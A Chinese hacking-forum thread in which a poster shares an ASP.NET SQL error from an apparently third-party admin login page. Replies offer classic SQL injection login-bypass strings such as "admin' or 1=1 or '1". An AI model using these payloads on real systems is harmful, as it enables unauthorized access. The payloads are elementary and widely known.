发新话题
打印

[讨论]关于asp.net注入

[讨论]关于asp.net注入

议题提交:haicao
信息来源:邪恶八进制信息安全团队(www.eviloctal.com

一个asp.net程序的用户后台登入点。怀疑存在sql注入,但提示有点怪,在这里寻求帮助。

已知用户名框输入为:aaaa'密码框输入为bbbb
用户类型选了第一个值为1提交后提示如下:
复制内容到剪贴板
代码:
“/”应用程序中的服务器错误。
--------------------------------------------------------------------------------

第 1 行: '08' 附近有语法错误。字符串 '' 之前有未闭合的引号。
说明: 执行当前 Web 请求期间,出现未处理的异常。请检查堆栈跟踪信息,以了解有关该错误以及代码中导致错误的出处的详细信息。

异常详细信息: System.Data.SqlClient.SqlException: 第 1 行: '08' 附近有语法错误。字符串 '' 之前有未闭合的引号。

源错误:

执行当前 Web 请求期间生成了未处理的异常。可以使用下面的异常堆栈跟踪信息确定有关异常原因和发生位置的信息。  

堆栈跟踪:


[SqlException: 第 1 行: '08' 附近有语法错误。
字符串 '' 之前有未闭合的引号。]
  RyAgent.DataProvider.GetDataReader(String SQL)
  RyAgent.Login.CheckAgentUser(String strUserName, String strPassword)
  RyAgent.Login.ImageButton1_Click(Object sender, ImageClickEventArgs e)
  System.Web.UI.WebControls.ImageButton.OnClick(ImageClickEventArgs e) +109
  System.Web.UI.WebControls.ImageButton.System.Web.UI.IPostBackEventHandler.RaisePostBackEvent(String eventArgument) +69
  System.Web.UI.Page.RaisePostBackEvent(IPostBackEventHandler sourceControl, String eventArgument) +18
  System.Web.UI.Page.RaisePostBackEvent(NameValueCollection postData) +33
  System.Web.UI.Page.ProcessRequestMain() +1292




--------------------------------------------------------------------------------
版本信息: Microsoft .NET Framework 版本:1.1.4322.2300; ASP.NET 版本:1.1.4322.2300
在我纯真年少時,有一個女生,她願意爲我失去生命,她意志堅定地說:你再纏著我,我就去死! 在我負笈外地時,有一個女生,她願意等我到下輩子,她溫柔婉約地說:你想成爲我男友?等下輩子!! 在我窮困潦倒時,有一個女生,她願意與我共赴黃泉,她眨著紅眼說:你再不還錢,我和你同歸于盡!

TOP

这一句不理解怎么回事?
第 1 行: '08' 附近有语法错误。字符串 '' 之前有未闭合的引号。
怎么写才能语法正确?
在我纯真年少時,有一個女生,她願意爲我失去生命,她意志堅定地說:你再纏著我,我就去死! 在我負笈外地時,有一個女生,她願意等我到下輩子,她溫柔婉約地說:你想成爲我男友?等下輩子!! 在我窮困潦倒時,有一個女生,她願意與我共赴黃泉,她眨著紅眼說:你再不還錢,我和你同歸于盡!

TOP

admin' or 1=1 or '1
sql=select * from admin where username='admin' or 1=1 or '1'

TOP

admin' or 'a'='a-- 行吗?
每个人都有属于自已的世界,人生因此而精彩,HACK就是我的世界!

TOP

少了一个‘号,加上就符合查询条件了
Www.China-Mu.Co.Kr 猪毛奇迹 1.02Q 将带给你无比的震撼。
注:此账号密码已更改,请本人与冰血联系修改密码。

TOP

发新话题